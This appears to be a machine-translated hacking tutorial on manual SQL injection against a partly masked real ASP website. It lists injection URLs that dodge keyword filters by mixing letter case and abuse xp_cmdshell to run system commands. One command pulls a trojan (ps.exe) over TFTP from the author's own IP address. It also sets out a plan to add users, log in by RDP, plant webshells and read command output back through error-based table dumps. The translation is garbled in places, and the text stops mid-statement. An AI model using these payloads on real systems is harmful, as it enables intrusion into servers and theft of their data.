Error Analysis and penetration technology in SQL Injection

Introduction: This article mainly describes some ideas and solutions for some special problems encountered in the SQL injection process, including some manual injection syntax and penetration thinking, I would like to share this document with my startup cainiao friends. I have mastered some technologies and hope to share them with you, learn them together, and improve them together.

I believe everyone has mastered the general method of judgment and injection. It is nothing more than adding single quotes, and 1 = 1 and 1 = 2. Yes, this is indeed the method for judging the injection, but it is far from enough to know about penetration infiltration. The example I quoted today can be identified as an injection vulnerability through this method, but it cannot be injected using tools. We will use the manual injection method today to analyze and judge the error information we encounter at any time during the injection process.

Example: http: // www. *****. com/zhuanti/zt. asp? Id = 34

An error is returned when a single quotation mark is added.
Add and 1 = 1 and return normal
Add and 1 = 2 and an error is returned.
Well, use a tool to inject it and check the result.

1:

It can be seen that the current connection user name, database name, and permission are SA, which is relatively large. Let's take a look at whether the command can be executed, open the NBSI command tool, and check the column C disk. The result shows nothing, and check the directory again. The result is still the same, and it is empty.
2:

At this point, the vast majority of New beginners may be getting stuck. Is there really no way? Yes !! Of course, this injection point filters out some keywords, so there is no way to use tools, but the injection can be successful by converting the case sensitivity of these keywords. The following describes the detailed steps to manually inject the site.

Idea of intrusion: Since the injection point permission is SA, the first consideration is to execute the command, add the user, and log on to 3389. If 3389 is not enabled, try to execute some upload operations with the command, for example, HTTP upload, FTP upload, and TFTP upload. Upload some Trojans and run them. If you cannot execute the command, you can also check the WEB main directory, use differential backup or LOG backup to get a WEBSHELL, and then restore the command to execute, upload the trojan and run it.

The preceding injection point is used as an example to determine whether the injection point can execute commands. As we all know, tool injection is useless. How can we determine whether the injection point can execute commands manually? We can create a table first, then execute the xp_mongoshell stored procedure to create a directory on disk C, and then read the sub-directories under disk C in the xp_subdirs stored procedure into the table, use the injection statement of the violent table to read the table content, so that we can know whether the directory is successfully created. If the directory is successfully created, execute the command. The injection statement is as follows:

(1) http: // www. *****. com/zhuanti/zt. asp? Id = 34; Create table temp (id nvarchAr (255), num1 nvarchAr (255), num2 nvarchAr (255), num3 nvarchAr (255 ));--
(2) http: // www. *****. com/zhuanti/zt. asp? Id = 34; eXec master. dbo. xp_mongoshell md c: cxd --
(3) http: // www. *****. com/zhuanti/zt. asp? Id = 34; Insert into temp (id) eXec master. dbo. xp_subdirs c :;--
(4) http: // www. *****. com/zhuanti/zt. asp? Id = 34 and (Select top 1 id from temp)> 0 --
(5) http: // www. *****. com/zhuanti/zt. asp? Id = 34 and (Select id from (Select top 1 * from (Select top 2 * from temp order by 1) T order by 1 desc) S)> 0 --
(6) http: // www. *****. com/zhuanti/zt. asp? Id = 34 and (Select id from (Select top 1 * from (Select top x * from temp order by 1) T order by 1 desc) S)> 0 --

However, an error occurs when you execute the first statement. Generally, it is normal to run the table creation command at the injection point, but this injection point has an error. 3:

The prompt message is: an object named temp already exists in the database.
Question 1: Is there a temp table in this database? Well, let's Delete the previous table first. The statement is as follows:
Http: // www. *****. com/zhuanti/zt. asp? Id = 34; Drop table temp --
But this error occurs again, and the prompt is: the table cannot be removed. The table does not exist. This is a strange thing. The table was created repeatedly, and an error occurred. Does the table still exist when it is deleted? Try again and create a temp1 table. The following message is displayed: the database already has an object named temp1.
Question 2: Is it because the database is confused with us? If we create a table and delete it, we will know in advance. I have done it step by step? It is unlikely that the database cannot reach this level of intelligence. There is only one possibility: we have submitted an injection statement for multiple times. After the first execution is successful, the subsequent re-execution will of course result in repeated table creation and table deletion errors. It's just that it's not verified yet. Since the table has been created successfully, we will submit the statements (2) to (4) in sequence to expose the contents of the ID column in the first record of temp in the table: cxd Haha, as I expected, a directory named cxd exists on drive C, which indicates that the injection point can execute commands. Then, submit the content of the second record of temp in the brute-force table in the (5) sentence. The returned content is still cxd, and then submit:
Http: // www. *****. com/zhuanti/zt. asp? Id = 34 and (Select id from (Select top 1 * from (Select top 3 * from temp order by 1) T order by 1 desc) S)> 0 --
The content of the third record is still cxd. Then, continue ..
Http: // www. *****. com/zhuanti/zt. asp? Id = 34 and (Select id from (Select top 1 * from (Select top x * from temp order by 1) T order by 1 desc) S)> 0 --
Change the position of X to 4 5 6 7 8 in sequence, and change the output content to: cxd to 5, and the output content to: Documents and Settings, originally, 1st to 4 records are the same, and 5th to 8 records are the same. Now I finally verified my current inference. The same statement was executed four times, resulting in execution of an insert statement and four records. This is why an error is prompted during table creation. Therefore, any returned information is only a reference. It is not necessarily correct. It may be confusing. We should make it clear during injection, which are true responses and false responses.

Okay, you can execute the command at this injection point. The next step is to use the scanner to scan the port and check whether port 3389 is enabled. The scan result is as follows: port 21 and port 80 are enabled only, it seems that adding user 3389 login is useless, so try TFTP upload. The injection statement is as follows:
Http: // www. *****. com/zhuanti/zt. asp? Id = 34; eXec master. dbo. xp_cmDshell tftp-I 221.121.125.20 get ps.exe c: ps.exe --
Note: 221.121.125.20 is the Internet IP address of my computer, and tftp-I 221.121.125.20 get ps.exe c: ps.exeis downloaded from my computer. ps.exe is saved in its C root directory. Run tftpd32.exe on the local machine before submitting the documents. You can search for the program on the Internet. The graphic interface program will be used at a glance,

4:
After clicking submit, the TFTPD32 window does not respond at all. If a machine is connected and the device is downloaded, The TFTPD32 window displays the IP address of the other party and the downloaded file name, it may be because the MSSQL Server cannot access the Internet on the Intranet or is blocked by the firewall. Now that we have the permission to execute commands, how can we further determine whether the MSSQL database is on the Intranet or the Internet, or what anti-virus software is installed, and what firewall? What about other things you are interested in?

Intrusion idea: execute some commands to save the results to the disk using the xp_mongoshell stored procedure, then read the file into the table using the bulk insert statement, and then use the injection statement to storm the table content, now we know the command execution result.
(1) http: // www. *****. com/zhuanti/zt. asp? Id = 34; eXec master. dbo. xp_cmDshell ipconfig/all c: cxd.txt --
Note: run the command ipconfig/all using xp_cmdshell and save the result to c: cxd.txt.
(2) http: // www. *****. com/zhuanti/zt. asp? Id = 34; Create table foo (line varchar (8000 ))--
(3) http: // www. *****. com/zhuanti/zt. asp? Id = 34; bulk iNsert foo from c: cxd.txt --
Note: bulk insert reads the text file c: cxd.txt into the table foo.
(4) http: // www. *****. com/zhuanti/zt. asp? Id = 34 and (sElect top 1 line from foo)> 0 --
Violence table foo 1st records
(5) http: // www. *****. com/zhuanti/zt. asp? Id = 34 and (sElect line from (sElect top 1 * from (sElect top 5 * from foo order by 1) T order by 1 desc) S)> 0 --
The content of the first brute force record, that is, the second line of c: cxd.txt. As mentioned above, every four records are a group...
And so on. All content is exposed .....

Result 5:

We can see that this machine is on the Intranet,
The IP address is:
IP Address ......: 192.168.0.123
IP Address ......: 192.168.0.7
The gateway is:
Default Gateway...: 192.168.0.1
Intranet machines are tricky. I don't know if it can access the Internet.
We can run ping on this machine.Www.tom.comThe injection statement is as follows:
(1) http: // www. *****. com/zhuanti/zt. asp? Id = 34; eXec master. dbo. xp_mongoshell pingWww.tom.com> C: cxd.txt --
(2) http: // www. *****. com/zhuanti/zt. asp? Id = 34; dElete from foo -- clear table content
(3) http: // www. *****. com/zhuanti/zt. asp? Id = 34; bulk iNsert foo from c: cxd.txt --
(4) http: // www. *****. com/zhuanti/zt. asp? Id = 34 and (sElect line from (sEl